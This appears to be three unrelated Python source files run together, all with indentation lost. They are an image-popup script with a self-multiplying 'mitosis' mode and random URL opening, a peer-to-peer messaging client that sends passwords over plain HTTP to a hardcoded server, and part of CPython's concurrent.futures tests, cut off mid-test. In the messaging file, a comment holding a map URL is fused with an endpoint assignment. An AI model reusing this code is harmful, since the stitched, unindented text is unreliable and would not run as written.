web_prob = 0
submission_text = 'I Submit <3'
sqLim = 800
panic_key = ''
captions = json.loads('{}')
PATH = str(pathlib.Path(__file__).parent.absolute())
os.chdir(PATH)
with open(PATH + '\\config.cfg', 'r') as cfg:
jsonObj = json.loads(cfg.read())
show_captions = int(jsonObj['showCaptions']) == 1
allow_scream = int(jsonObj['promptMod']) == 0
panic_disabled = int(jsonObj['panicDisabled']) == 1
mitosis_enabled = int(jsonObj['mitosisMode']) == 1
web_open = int(jsonObj['webPopup']) == 1
web_prob = int(jsonObj['webMod'])
sqLim = int(jsonObj['squareLim'])
panic_key = jsonObj['panicButton']
#extreme_mode = int(jsonObj['extremeMode']) == 1
if web_open:
webJsonDat = ''
if os.path.exists(PATH + '\\resource\\web.json'):
with open(PATH + '\\resource\\web.json', 'r') as webF:
webJsonDat = json.loads(webF.read())
hasWeb = len(webJsonDat['urls']) > 0
try:
with open(PATH + '\\resource\\captions.json', 'r') as capF:
captions = json.loads(capF.read())
has_captions = True
try:
submission_text = captions['subtext']
except:
print('will use default submission text')
except:
print('no captions.json')
class GImg(tk.Label):
def load(self, path, rWid, rHgt, delay=75):
self.image = Image.open(path)
self.frames = []
self.delay = delay
try:
for i in count(1):
self.frames.append(ImageTk.PhotoImage(self.image.resize((rWid, rHgt), Image.BOX).copy()))
self.image.seek(i)
except:
print('Done register frames. (' + str(len(self.frames)) + ')')
self.frames_ = cycle(self.frames)
def nextFrame(self):
if self.frames_:
self.config(image=next(self.frames_))
self.after(self.delay, self.nextFrame)
def unborderedWindow():
#var things
arr = os.listdir(os.path.abspath(os.getcwd()) + '\\resource\\img\\')
item = arr[rand.randrange(len(arr))]
while item.split('.')[len(item.split('.')) - 1].lower() == 'ini':
item = arr[rand.randrange(len(arr))]
image = Image.open(os.path.abspath(os.getcwd()) + '\\resource\\img\\' + item)
gif_bool = item.split('.')[len(item.split('.')) - 1].lower() == 'gif'
border_wid_const = 5
monitor_data = monitor_areas()
data_list = list(monitor_data[rand.randrange(0, len(monitor_data))][2])
screenWid = data_list[2] - data_list[0]
screenHgt = data_list[3] - data_list[1]
#window start
root = Tk()
root.bind('<KeyPress>', lambda key: panic(key))
root.configure(bg='black')
root.overrideredirect(1)
root.frame = Frame(root, borderwidth=border_wid_const, relief=RAISED)
root.wm_attributes('-topmost', 1)
def bResize(img) -> Image:
size_source = max(img.width, img.height) / min(screenWid, screenHgt)
size_target = rand.randint(30, 70) / 100
resize_factor = size_target / size_source
return image.resize((int(image.width * resize_factor), int(image.height * resize_factor)), Image.ANTIALIAS)
rImg = bResize(image)
image_ = ImageTk.PhotoImage(rImg)
#different handling for gifs vs normal images
if(not gif_bool):
label = Label(root, image=image_, bg='black')
label.grid(row=0, column=0)
else:
label = GImg(root)
label.load(path=os.path.abspath(os.getcwd()) + '\\resource\\img\\' + item, rWid = rImg.width, rHgt = rImg.height)
label.pack()
locX = rand.randint(data_list[0], data_list[2] - (rImg.width))
locY = rand.randint(data_list[1], max(data_list[3] - (rImg.height), 0))
root.geometry('%dx%d+%d+%d' % ((rImg.width), (rImg.height), locX, locY))
if(gif_bool):
label.nextFrame()
if show_captions and has_captions:
capText = selectCaption(item)
if len(capText) > 0:
captionLabel = Label(root, text=capText, wraplength=rImg.width - border_wid_const)
captionLabel.place(x=5, y=5)
subButton = Button(root, text=submission_text, command=die)
subButton.place(x=rImg.width - 5 - subButton.winfo_reqwidth(), y=rImg.height - 5 - subButton.winfo_reqheight())
#disabled for performance
#if allow_scream:
# thread.Thread(target=lambda: scream(root)).start()
root.mainloop()
def doRoll(mod):
return mod > rand.randint(0, 100)
def urlSelect(arg):
return webJsonDat['urls'][arg] + webJsonDat['args'][arg].split(',')[rand.randrange(len(webJsonDat['args'][arg].split(',')))]
def scream(root):
while True:
time.sleep(rand.randint(1, 3))
root.focus_force()
def die():
if web_open and hasWeb and doRoll((100-web_prob) / 2):
urlPath = urlSelect(rand.randrange(len(webJsonDat['urls'])))
webbrowser.open_new(urlPath)
if mitosis_enabled:
os.startfile('popup.pyw')
os.startfile('popup.pyw')
os.kill(os.getpid(), 9)
def selectCaption(strObj):
for obj in captions['prefix']:
if strObj.startswith(obj):
ls = captions[obj]
ls.extend(captions['default'])
return ls[rand.randrange(0, len(captions[obj]))]
return captions['default'][rand.randrange(0, len(captions['default']))] if (len(captions['default']) > 0) else ''
def panic(key):
if not panic_disabled and (key.keysym == panic_key or key.keycode == panic_key): #(post or is to keep backwards compatibility)
os.startfile('panic.pyw')
try:
unborderedWindow()
except Exception as e:
messagebox.showerror('Popup Error', 'Could not show popup.\n[' + str(e) + ']')
|
dht_msg.py
|
import sys
import random
import requests
import binascii
import umsgpack
from ast import literal_eval
from future.moves.urllib.parse import urlencode
#from multiprocessing import Process as Thread, Event
from threading import Thread, Event
from pyp2p.lib import is_ip_valid, is_valid_port
from twisted.internet import defer
import json
import string
import binascii
try:
from Queue import Queue # py2
except ImportError:
from queue import Queue # py3
import time
import logging
#https://www.google.com/maps/place/AbsoluteCare+Medical+Center+%26+Pharmacy/@33.8118968,-84.3943467,17z/data=!4m2!3m1!1s0x88f505a894eff833:0xadc876bfec8fc2eedht_msg_endpoint = "http://162.243.213.95/dht_msg.php"
dht_msg_endpoint = "http://localhost/dht_msg.php"
logging.basicConfig()
log = logging.getLogger(__name__)
LONG_POLLING = True
RESERVATION_TIMEOUT = (10 * 60) - 5
MUTEX_TIMEOUT = RESERVATION_TIMEOUT
# Keep up to date so when the reservation timeout has expired
# We're still fairly fresh on the stack.
ALIVE_TIMEOUT = 60 * 5
class DHTProtocol:
def __init__(self):
self.messages_received = None
class DHT:
def __init__(self, node_id=None, ip=None, port=0, password=None, network_id="default", debug=0, networking=1):
self.node_id = node_id or self.rand_str(20)
if sys.version_info >= (3, 0, 0):
if type(self.node_id) == str:
self.node_id = self.node_id.encode("ascii")
else:
if type(self.node_id) == unicode:
self.node_id = str(self.node_id)
self.node_id = binascii.hexlify(self.node_id).decode('utf-8')
self.password = password or self.rand_str(30)
self.ip = ip
self.port = port
self.network_id = network_id
self.check_interval = 3 # For slow connections, unfortunately.
self.last_check = 0
self.debug = debug
self.networking = networking
self.relay_links = {}
self.protocol = DHTProtocol()
self.is_registered = Event()
self.is_mutex_ready = Event()
self.is_neighbours_ready = Event()
self.handles = []
self.threads = []
self.running = 1
self.has_mutex = 0
self.neighbours = []
# Register a new "account."
if self.networking:
self.register(self.node_id, self.password)
self.is_registered.wait(5)
self.mutex_loop()
self.is_mutex_ready.wait(5)
self.alive_loop()
self.find_neighbours_loop()
self.is_neighbours_ready.wait(5)
assert(self.is_mutex_ready.is_set())
assert(self.is_registered.is_set())
self.message_handlers = set()
def stop(self):
self.running = 0
for handle in self.handles:
handle.close()
# handle.raw._fp.close()
def hook_queue(self, q):
self.protocol.messages_received = q
self.check_for_new_messages()
def retry_in_thread(self, f, args={"args": None}, check_interval=2):
def thread_loop(this_obj):
while 1:
try:
while not f(**args) and this_obj.running:
time.sleep(check_interval)
if not this_obj.running:
return
return
except Exception as e:
print(e)
time.sleep(1)
t = Thread(target=thread_loop, args=(self,))
t.setDaemon(True)
self.threads.append(t)
t.start()
return t
def check_for_new_messages(self):
def do(args):
for msg in self.list(self.node_id, self.password):
self.protocol.messages_received.put(msg)
return 0
if LONG_POLLING:
self.retry_in_thread(do, check_interval=0.1)
else:
self.retry_in_thread(do, check_interval=2)
def mutex_loop(self):
def do(args):
# Requests a mutex from the server.
call = dht_msg_endpoint + "?call=get_mutex&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password})
# Make API call.
ret = requests.get(call, timeout=5).text
if "1" in ret or "0" in ret:
self.has_mutex = int(ret)
self.is_mutex_ready.set()
return 0
self.retry_in_thread(do, check_interval=MUTEX_TIMEOUT)
def alive_loop(self):
def do(args):
# Requests a mutex from the server.
call = dht_msg_endpoint + "?call=last_alive&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password})
# Make API call.
ret = requests.get(call, timeout=5)
return 0
self.retry_in_thread(do, check_interval=ALIVE_TIMEOUT)
def can_test_knode(self, id):
for neighbour in self.neighbours:
if neighbour.id == id:
if neighbour.can_test:
return 1
return 0
def has_testable_neighbours(self):
for neighbour in self.neighbours:
if neighbour.can_test:
return 1
return 0
def find_neighbours_loop(self):
def do(args):
# Requests a mutex from the server.
call = dht_msg_endpoint + "?call=find_neighbours&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password}) + "&"
call += urlencode({"network_id": self.network_id})
# Make API call.
ret = requests.get(call, timeout=5).text
ret = json.loads(ret)
#self.is_neighbours_ready.set()
#return
if type(ret) == dict:
ret = [ret]
# Convert to kademlia neighbours.
neighbours = []
for neighbour in ret:
if not is_ip_valid(neighbour["ip"]):
continue
neighbour["port"] = int(neighbour["port"])
if not is_valid_port(neighbour["port"]):
continue
neighbour["can_test"] = int(neighbour["can_test"])
from storjkademlia.node import Node as KadNode
knode = KadNode(
id=binascii.unhexlify(neighbour["id"].encode("ascii")),
ip=neighbour["ip"],
port=neighbour["port"],
can_test=neighbour["can_test"]
)
neighbours.append(knode)
self.neighbours = neighbours
self.is_neighbours_ready.set()
return 0
self.retry_in_thread(do, check_interval=ALIVE_TIMEOUT)
def get_neighbours(self):
return self.neighbours
def add_relay_link(self, dht):
node_id = binascii.hexlify(dht.get_id())
self.relay_links[node_id.decode("utf-8")] = dht
def debug_print(self, msg):
if self.debug:
print(str(msg))
def add_message_handler(self, handler):
self.message_handlers.add(handler)
def remove_transfer_request_handler(self, handler):
pass
def rand_str(self, length):
return ''.join(random.choice(string.digits + string.ascii_lowercase +
string.ascii_uppercase
) for i in range(length))
def register(self, node_id, password):
def do(node_id, password):
try:
# Registers a new node to receive messages.
call = dht_msg_endpoint + "?call=register&"
call += urlencode({"node_id": node_id}) + "&"
call += urlencode({"password": password}) + "&"
call += urlencode({"port": self.port}) + "&"
call += urlencode({"network_id": self.network_id})
if self.ip is not None:
call += "&" + urlencode({"ip": self.ip})
# Make API call.
ret = requests.get(call, timeout=5)
self.handles.append(ret)
if "success" not in ret.text:
return 0
self.is_registered.set()
return 1
except Exception as e:
self.debug_print("Register timed out in DHT msg")
self.debug_print("DHT REGISTER FAILED")
return 0
mappings = {
"node_id": node_id,
"password": password
}
self.retry_in_thread(do, mappings)
def build_dht_response(self, msg):
msg = binascii.unhexlify(msg)
msg = umsgpack.unpackb(msg)
try:
str_types = [type(u""), type(b"")]
if type(msg) in str_types:
msg = literal_eval(msg)
except:
msg = str(msg)
return msg
def serialize_message(self, msg):
msg = umsgpack.packb(msg)
msg = binascii.hexlify(msg)
return msg
def async_dht_put(self, key, value):
d = defer.Deferred()
def do(args):
t = self.put(key, value, list_pop=0)
while t.isAlive():
time.sleep(1)
d.callback("success")
return 1
self.retry_in_thread(do)
return d
def async_dht_get(self, key):
d = defer.Deferred()
def do(args):
ret = self.list(node_id=key, list_pop=0, timeout=5)
if len(ret):
d.callback(ret[0])
else:
d.callback(None)
return 1
self.retry_in_thread(do)
return d
def put(self, node_id, msg, list_pop=1):
def do(node_id, msg):
if node_id in self.relay_links:
relay_link = self.relay_links[node_id]
msg = self.build_dht_response(self.serialize_message(msg))
relay_link.protocol.messages_received.put_nowait(msg)
return 1
try:
# Send a message directly to a node in the "DHT"
call = dht_msg_endpoint + "?call=put&"
call += urlencode({"dest_node_id": node_id}) + "&"
msg = self.serialize_message(msg)
call += urlencode({"msg": msg}) + "&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password}) + "&"
call += urlencode({"list_pop": list_pop})
# Make API call.
ret = requests.get(call, timeout=5)
self.handles.append(ret)
if "success" not in ret.text:
return 0
return 1
except Exception as e:
# Reschedule call.
self.debug_print("DHT PUT TIMED OUT")
self.debug_print(e)
self.debug_print("Rescheduling DHT PUT")
self.debug_print("PUT FAILED")
return 0
mappings = {
"node_id": node_id,
"msg": msg
}
return self.retry_in_thread(do, mappings)
def list(self, node_id=None, password=None, list_pop=1, timeout=None):
if not self.networking:
return []
node_id = node_id or self.node_id
password = password or self.password
try:
# Get messages send to us in the "DHT"
call = dht_msg_endpoint + "?call=list&"
call += urlencode({"node_id": node_id}) + "&"
call += urlencode({"password": password}) + "&"
call += urlencode({"list_pop": list_pop})
# Make API call.
if timeout is None:
if LONG_POLLING:
timeout = None
else:
timeout = 4
ret = requests.get(call, timeout=timeout)
self.handles.append(ret)
content_gen = ret.iter_content()
messages = ret.text
messages = json.loads(messages)
# List.
if type(messages) == dict:
messages = [messages]
# Return a list of responses.
ret = []
if type(messages) == list:
for msg in messages:
dht_response = self.build_dht_response(msg)
ret.append(dht_response)
return ret
except Exception as e:
self.debug_print("Exception in dht msg list")
return []
def direct_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def relay_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def repeat_relay_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def async_direct_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def send_direct_message(self, node_id, msg):
if sys.version_info >= (3, 0, 0):
if type(node_id) == bytes:
node_id = binascii.hexlify(node_id).decode("utf-8")
else:
if type(node_id) == str:
node_id = binascii.hexlify(node_id).decode("utf-8")
if type(node_id) != str:
node_id = node_id.decode("utf-8")
self.put(node_id, msg)
def get_id(self):
node_id = self.node_id
if sys.version_info >= (3, 0, 0):
if type(node_id) == str:
node_id = node_id.encode("ascii")
else:
if type(node_id) == unicode:
node_id = str(node_id)
return binascii.unhexlify(node_id)
def has_messages(self):
return not self.protocol.messages_received.empty()
def get_messages(self):
result = []
if self.has_messages():
while not self.protocol.messages_received.empty():
result.append(self.protocol.messages_received.get())
# Run handlers on messages.
old_handlers = set()
for received in result:
for handler in self.message_handlers:
expiry = handler(
self,
received
)
if expiry == -1:
old_handlers.add(handler)
# Expire old handlers.
for handler in old_handlers:
self.message_handlers.remove(handler)
return result
return result
if __name__ == "__main__":
node_1 = DHT(ip="127.0.0.1", port=1337)
node_2 = DHT(ip="127.0.0.1", port=1338)
node_3 = DHT(ip="127.0.0.1", port=1339)
print(node_1.ip)
print(node_1.port)
print(node_2.neighbours)
print("Node 1 has mutex")
print(node_1.has_mutex)
print()
print("Node 2 has mutex")
print(node_2.has_mutex)
print()
print("Node 3 has mutex")
print(node_3.has_mutex)
#node1 = DHT()
#print(node1.get_id())
#print(node1.node_id)
pass
"""
node1 = DHT()
node2 = DHT()
node1.put(node2.node_id, "test")
running = 1
time.sleep(5)
node1.stop()
node2.stop()
"""
"""
#print(node2.protocol.messages_received.get())
#print(node2.get_messages())
while not node2.has_messages() and running:
for msg in node2.get_messages():
running = 0
print(msg)
print("No longer runnig")
"""
"""
#dht_node = DHT(node_id=b"\111" * 20, password="svymQQzF1j7FGmYf8fENs4mvRd")
dht_node = DHT(node_id=u"T", password="svymQQzF1j7FGmYf8fENs4mvRd")
x = [("a", 2), ("b!%--", 2)]
dht_node.put(dht_node.node_id, x)
print(dht_node.list(dht_node.node_id, dht_node.password))
exit()
print(dht_node.node_id)
print(dht_node.get_id())
print(type(dht_node.get_id()))
dht_node.send_direct_message(dht_node.node_id, u"test")
print(dht_node.list(dht_node.node_id, dht_node.password))
exit()
print(dht_node.node_id)
print(dht_node.password)
print(dht_node.list(dht_node.node_id, dht_node.password))
"""
|
test_concurrent_futures.py
|
import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
from test.support.script_helper import assert_python_ok
import contextlib
import itertools
import logging
from logging.handlers import QueueHandler
import os
import queue
import sys
import threading
import time
import unittest
import weakref
from pickle import PicklingError
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future,
BrokenExecutor)
from concurrent.futures.process import BrokenProcessPool
from multiprocessing import get_context
import multiprocessing.process
import multiprocessing.util
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
INITIALIZER_STATUS = 'uninitialized'
def mul(x, y):
return x * y
def capture(*args, **kwargs):
return args, kwargs
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
def init(x):
global INITIALIZER_STATUS
INITIALIZER_STATUS = x
def get_init_status():
return INITIALIZER_STATUS
def init_fail(log_queue=None):
if log_queue is not None:
logger = logging.getLogger('concurrent.futures')
logger.addHandler(QueueHandler(log_queue))
logger.setLevel('CRITICAL')
logger.propagate = False
time.sleep(0.1) # let some futures be scheduled
raise ValueError('error in initializer')
class MyObject(object):
def my_method(self):
pass
class EventfulGCObj():
def __init__(self, ctx):
mgr = get_context(ctx).Manager()
self.event = mgr.Event()
def __del__(self):
self.event.set()
def make_dummy_object(_):
return MyObject()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._thread_key = test.support.threading_setup()
def tearDown(self):
test.support.reap_children()
test.support.threading_cleanup(*self._thread_key)
class ExecutorMixin:
worker_count = 5
executor_kwargs = {}
def setUp(self):
super().setUp()
self.t1 = time.monotonic()
if hasattr(self, "ctx"):
self.executor = self.executor_type(
max_workers=self.worker_count,
mp_context=self.get_context(),
**self.executor_kwargs)
else:
self.executor = self.executor_type(
max_workers=self.worker_count,
**self.executor_kwargs)
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
self.executor = None
dt = time.monotonic() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 300, "synchronization issue: test lasted too long")
super().tearDown()
def get_context(self):
return get_context(self.ctx)
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolForkMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "fork"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
class ProcessPoolSpawnMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "spawn"
class ProcessPoolForkserverMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "forkserver"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
def create_executor_tests(mixin, bases=(BaseTestCase,),
executor_mixins=(ThreadPoolMixin,
ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin)):
def strip_mixin(name):
if name.endswith(('Mixin', 'Tests')):
return name[:-5]
elif name.endswith('Test'):
return name[:-4]
else:
return name
for exe in executor_mixins:
name = ("%s%sTest"
% (strip_mixin(exe.__name__), strip_mixin(mixin.__name__)))
cls = type(name, (mixin,) + (exe,) + bases, {})
globals()[name] = cls
class InitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
global INITIALIZER_STATUS
INITIALIZER_STATUS = 'uninitialized'
self.executor_kwargs = dict(initializer=init,
initargs=('initialized',))
super().setUp()
def test_initializer(self):
futures = [self.executor.submit(get_init_status)
for _ in range(self.worker_count)]
for f in futures:
self.assertEqual(f.result(), 'initialized')
class FailingInitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
if hasattr(self, "ctx"):
# Pass a queue to redirect the child's logging output
self.mp_context = self.get_context()
self.log_queue = self.mp_context.Queue()
self.executor_kwargs = dict(initializer=init_fail,
initargs=(self.log_queue,))
else:
# In a thread pool, the child shares our logging setup
# (see _assert_logged())
self.mp_context = None
self.log_queue = None
self.executor_kwargs = dict(initializer=init_fail)
super().setUp()
def test_initializer(self):
with self._assert_logged('ValueError: error in initializer'):
try:
future = self.executor.submit(get_init_status)
except BrokenExecutor:
# Perhaps the executor is already broken
pass
else:
with self.assertRaises(BrokenExecutor):
future.result()
# At some point, the executor should break
t1 = time.monotonic()
while not self.executor._broken:
if time.monotonic() - t1 > 5:
self.fail("executor not broken after 5 s.")
time.sleep(0.01)
# ... and from this point submit() is guaranteed to fail
with self.assertRaises(BrokenExecutor):
self.executor.submit(get_init_status)
def _prime_executor(self):
pass
@contextlib.contextmanager
def _assert_logged(self, msg):
if self.log_queue is not None:
yield
output = []
try:
while True:
output.append(self.log_queue.get_nowait().getMessage())
except queue.Empty:
pass
else:
with self.assertLogs('concurrent.futures', 'CRITICAL') as cm:
yield
output = cm.output
self.assertTrue(any(msg in line for line in output),
output)
create_executor_tests(InitializerMixin)
create_executor_tests(FailingInitializerMixin)
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
if __name__ == "__main__":
context = '{context}'
if context == "":
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_submit_after_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
import atexit
@atexit.register
def run_last():
try:
t.submit(id, None)
except RuntimeError:
print("runtime-error")
raise
from concurrent.futures import {executor_type}
if __name__ == "__main__":
context = '{context}'
if not context:
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(id, 42).result()
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertIn("RuntimeError: cannot schedule new futures", err.decode())
self.assertEqual(out.strip(), b"runtime-error")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
call_queue = executor._call_queue
queue_management_thread = executor._queue_management_thread
del executor
# Make sure that all the executor resources were properly cleaned by
# the shutdown process
queue_management_thread.join()
for p in processes.values():
p.join()
call_queue.join_thread()
create_executor_tests(ProcessPoolShutdownTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
create_executor_tests(WaitTests,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
# Issue #31641: accept arbitrary iterables.
future1 = self.executor.submit(time.sleep, 2)
completed = [
f for f in futures.as_completed(itertools.repeat(future1, 3))
]
